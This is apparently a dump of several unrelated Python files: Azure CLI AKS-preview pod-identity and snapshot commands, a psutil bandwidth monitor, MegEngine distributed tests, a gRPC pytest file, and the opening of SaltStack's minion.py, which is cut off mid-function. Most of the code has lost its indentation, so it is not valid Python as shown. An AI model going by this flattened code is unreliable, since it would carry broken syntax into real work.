def _get_http_proxy_config(file_path):
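    """Load an HTTP proxy configuration JSON file (see https://aka.ms/HttpProxyConfig)
    and map it onto a ManagedClusterHTTPProxyConfig object.
    """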
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the snapshot "{}" in resource group "{}". Are you sure?'.format(name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
|
bandwidth-report.py
|
import time
import threading
from datetime import datetime
import psutil
import json
# Feel free to update these values to suit your needs
monitor_interface = 'eth0'
monitor_duration_seconds = 10
class Stats(object):
def __init__(self):
# Bandwidth report file.
self.bw_report_file = 'bandwidth-report.json'
# Thread details
self._thread = None
self._thread_stop = threading.Event()
# Initial network counters
self.if_name = None
try:
ifaces = psutil.net_io_counters(pernic=True)
iface_names = ', '.join(ifaces.keys())
print('Interfaces found: {}'.format(iface_names))
for iface in ifaces.keys():
if monitor_interface == iface:
print('Monitoring Interface: {}'.format(monitor_interface))
self.if_name = iface
break
if self.if_name is not None:
break
if self.if_name is None:
print('Monitoring data over ALL interfaces')
else:
print('Monitoring data over single interface: {}'.format(self.if_name))
except Exception:
print('Unable to find monitor interface. Using ALL interfaces data for bandwidth calculation')
if self.if_name is not None:
self.start_bytes_sent = psutil.net_io_counters(pernic=True)[self.if_name].bytes_sent
self.start_bytes_recv = psutil.net_io_counters(pernic=True)[self.if_name].bytes_recv
else:
self.start_bytes_sent = psutil.net_io_counters().bytes_sent
self.start_bytes_recv = psutil.net_io_counters().bytes_recv
def update_stats(self):
try:
cpu_usage = psutil.cpu_percent()
mem_usage = psutil.virtual_memory().percent
# Download BW (MB)
try:
download_bytes = psutil.net_io_counters(pernic=True)[self.if_name].bytes_recv - self.start_bytes_recv
self.start_bytes_recv = psutil.net_io_counters(pernic=True)[self.if_name].bytes_recv
except Exception:
# Monitored interface not found; fall back to aggregate (all-NIC) counters
download_bytes = psutil.net_io_counters().bytes_recv - self.start_bytes_recv
self.start_bytes_recv = psutil.net_io_counters().bytes_recv
#self.start_bytes_recv = psutil.net_io_counters(pernic=True)['wlp1s0'].bytes_recv
download_mb = round(download_bytes/(1024.0 * 1024.0), 2)
# Upload BW (MB)
try:
upload_bytes = psutil.net_io_counters(pernic=True)[self.if_name].bytes_sent - self.start_bytes_sent
self.start_bytes_sent = psutil.net_io_counters(pernic=True)[self.if_name].bytes_sent
except Exception:
# Monitored interface not found; fall back to aggregate (all-NIC) counters
upload_bytes = psutil.net_io_counters().bytes_sent - self.start_bytes_sent
self.start_bytes_sent = psutil.net_io_counters().bytes_sent
upload_mb = round(upload_bytes/(1024.0 * 1024.0), 2)
print('Last {} seconds Stats: CPU {}%, Mem {}%, Download {}MB, Upload {}MB'.format(monitor_duration_seconds, cpu_usage, mem_usage, download_mb, upload_mb))
# Save the stats
bw_report = {}
try:
with open(self.bw_report_file, 'r') as f:
bw_report = json.load(f)
except Exception:
bw_report = {}
saved_upload_mb = bw_report.get('upload_mb') or 0
saved_download_mb = bw_report.get('download_mb') or 0
last_updated = datetime.now().isoformat()
saved_upload_mb += upload_mb
saved_download_mb += download_mb
bw_report['last_updated'] = last_updated
bw_report['upload_mb'] = round(saved_upload_mb, 2)
bw_report['download_mb'] = round(saved_download_mb, 2)
with open(self.bw_report_file, 'w') as f:
json.dump(bw_report, f, indent=2)
except Exception as ex:
print('Exception occurred while saving stats; ignoring. Ex: {}'.format(ex))
def run(self):
print('CPU, Memory and Bandwidth Stats (every {} seconds)'.format(monitor_duration_seconds))
while True:
try:
# If closed (^C), then break
if self._thread_stop.is_set():
print('Exiting stats thread.')
break
# Check stats every monitor_duration_seconds seconds.
time.sleep(monitor_duration_seconds)
self.update_stats()
except Exception as ex:
print('Exception occurred during stats thread, ignoring: {}'.format(ex))
time.sleep(monitor_duration_seconds)
def run_nonblock(self):
print('Starting Bandwidth Stats thread')
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._thread_stop.set()
if __name__ == '__main__':
# To run this as a thread from another class, use this code.
# statsObj = Stats()
# statsObj.run_nonblock()
# statsObj._thread.join()
statsObj = Stats()
statsObj.run()
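# Illustrative sketch (added comment): after a few intervals the
# bandwidth-report.json file written by update_stats() looks roughly like the
# object below; the values are hypothetical.
#
#   {
#     "last_updated": "2021-01-01T12:00:00.000000",
#     "upload_mb": 12.34,
#     "download_mb": 56.78
#   }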
|
test_distributed.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import queue
import numpy as np
import pytest
import megengine as mge
import megengine.distributed as dist
from megengine.core.ops.builtin import CollectiveComm, ParamPackConcat, ParamPackSplit
from megengine.distributed.helper import (
get_device_count_by_fork,
param_pack_concat,
param_pack_split,
)
def _assert_q_empty(q):
try:
res = q.get(timeout=1)
except Exception as e:
assert isinstance(e, queue.Empty)
else:
assert False, "queue is not empty"
def _assert_q_val(q, val):
ret = q.get()
assert ret == val
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_init_process_group():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank, backend):
dist.init_process_group("localhost", port, world_size, rank, rank, backend)
assert dist.is_distributed()
assert dist.get_rank() == rank
assert dist.get_world_size() == world_size
assert dist.get_backend() == backend
py_server_addr = dist.get_py_server_addr()
assert py_server_addr[0] == "localhost"
assert py_server_addr[1] == port
mm_server_addr = dist.get_mm_server_addr()
assert mm_server_addr[0] == "localhost"
assert mm_server_addr[1] > 0
assert isinstance(dist.get_client(), dist.Client)
def check(backend):
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, backend))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
check("nccl")
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_new_group():
world_size = 3
ranks = [2, 0]
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank):
dist.init_process_group("localhost", port, world_size, rank, rank)
if rank in ranks:
group = dist.new_group(ranks)
assert group.size == 2
assert group.key == "2,0"
assert group.rank == ranks.index(rank)
assert group.comp_node == "gpu{}:2".format(rank)
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_group_barrier():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
dist.group_barrier()
q.put(0) # to be observed in rank 1
else:
_assert_q_empty(q) # q.put(0) is not executed in rank 0
dist.group_barrier()
_assert_q_val(q, 0) # q.put(0) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="do not imp GPU mode at Windows now"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_synchronized():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
@dist.synchronized
def func(rank, q):
q.put(rank)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
func(0, q) # q.put(0)
q.put(2)
else:
_assert_q_val(q, 0) # func executed in rank 0
_assert_q_empty(q) # q.put(2) is not executed
func(1, q)
_assert_q_val(
q, 1
) # func in rank 1 executed earlier than q.put(2) in rank 0
_assert_q_val(q, 2) # q.put(2) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
def test_oprmm_hashable():
lhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
rhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
assert lhs == rhs
assert hash(lhs) == hash(rhs)
def test_param_pack_split():
a = mge.Tensor(np.ones((10,), np.int32))
b, c = param_pack_split(a, [0, 1, 1, 10], [(1,), (3, 3)])
assert np.allclose(b.numpy(), a.numpy()[1])
assert np.allclose(c.numpy(), a.numpy()[1:].reshape(3, 3))
def test_param_pack_concat():
a = mge.Tensor(np.ones((1,), np.int32))
b = mge.Tensor(np.ones((3, 3), np.int32))
offsets_val = [0, 1, 1, 10]
offsets = mge.Tensor(offsets_val, np.int32)
c = param_pack_concat([a, b], offsets, offsets_val)
assert np.allclose(np.concatenate([a.numpy(), b.numpy().flatten()]), c.numpy())
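# Note added for clarity (not part of the original tests): the offsets list
# [0, 1, 1, 10] used above appears to be flattened (start, end) pairs for each
# packed tensor -- elements [0:1] map to the (1,)-shaped tensor and elements
# [1:10] map to the (3, 3)-shaped tensor, which is what the reshape assertions
# exercise.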
|
test_merchant.py
|
import pytest
import grpc
import threading
from stub.test_pb2 import EchoRequest, Empty
from merchant_stub.data_pb2 import UpdateSupplierReq
@pytest.fixture(scope='module')
def grpc_add_to_server():
from merchant_stub.merchant_service_pb2_grpc import add_MerchantServiceServicer_to_server
return add_MerchantServiceServicer_to_server
@pytest.fixture(scope='module')
def grpc_servicer():
from merchant_servicer import Servicer
return Servicer()
@pytest.fixture(scope='module')
def grpc_stub(grpc_channel):
from merchant_stub.merchant_service_pb2_grpc import MerchantServiceStub
return MerchantServiceStub(grpc.insecure_channel("10.1.152.116:9006"))
def test_some(grpc_stub):
request = UpdateSupplierReq(country='VN', name='pytest')
response = grpc_stub.UpsertSupplier(request)
assert response.name == f'test-{request.name}'
def test_example(grpc_stub):
request = EchoRequest()
response = grpc_stub.error_handler(request)
print("1111")
assert response.name == f'test-{request.name}'
grpc_max_workers = 2
def test_blocking(grpc_stub):
stream = grpc_stub.blocking(Empty())
# after this call the servicer blocks its thread
def call_unblock():
# with grpc_max_workers = 1 this call could not be executed
grpc_stub.unblock(Empty())
grpc_stub.unblock(Empty())
t = threading.Thread(target=call_unblock)
t.start()
for resp in stream:
pass
t.join()
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import multiprocessing
from random import shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
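# Illustrative example (added comment, hypothetical values): for opts such as
# {'master': 'salt.example.com', 'master_port': 4506, 'ipv6': False,
#  'retry_dns': 30, 'file_client': 'remote'}, resolve_dns() returns something
# like {'master_ip': '192.0.2.10', 'master_uri': 'tcp://192.0.2.10:4506'};
# with file_client 'local' and use_master_when_local unset it falls back to
# {'master_ip': '127.0.0.1', 'master_uri': 'tcp://127.0.0.1:4506'}.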
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
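# Illustrative example (added comment): with master_uri_format set to anything
# other than 'ip_only', prep_ip_port({'master': 'localhost:1234', ...}) yields
# {'master': 'localhost', 'master_port': '1234'}, while a bare hostname such as
# 'mysaltmaster' passes through unchanged as {'master': 'mysaltmaster'}.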
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: anything os.makedirs would accept as a mode.
uid: the uid to set. If not set, None, or -1, no changes are made.
The same applies if the directory is already owned by this
uid. Must be an int. Works only on Unix/Unix-like systems.
gid: the gid to set. If not set, None, or -1, no changes are made.
The same applies if the directory is already owned by this
gid. Must be an int. Works only on Unix/Unix-like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
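# Illustrative usage (added comment, hypothetical values):
#   proc_dir = get_proc_dir('/var/cache/salt/minion', mode=0o700, uid=0, gid=0)
# ensures /var/cache/salt/minion/proc exists with the requested mode/ownership
# and returns that path; called with only the cachedir it just creates the
# directory if missing.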
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_input
# above, as that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# The function supports **kwargs, or the parsed keyword is a
# positional argument of the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# The function supports **kwargs, or this keyword is a
# positional argument of the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
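# Illustrative example (added comment, assuming the target function accepts
# **kwargs): for args like ['foo', {'__kwarg__': True, 'bar': 'baz'}],
# load_args_and_kwargs() returns (['foo'], {'bar': 'baz'}); when data is a
# publish dict its items are additionally packed into kwargs as
# '__pub_<key>' entries.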
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minion's initialization
phase (for example from the minion's main event loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
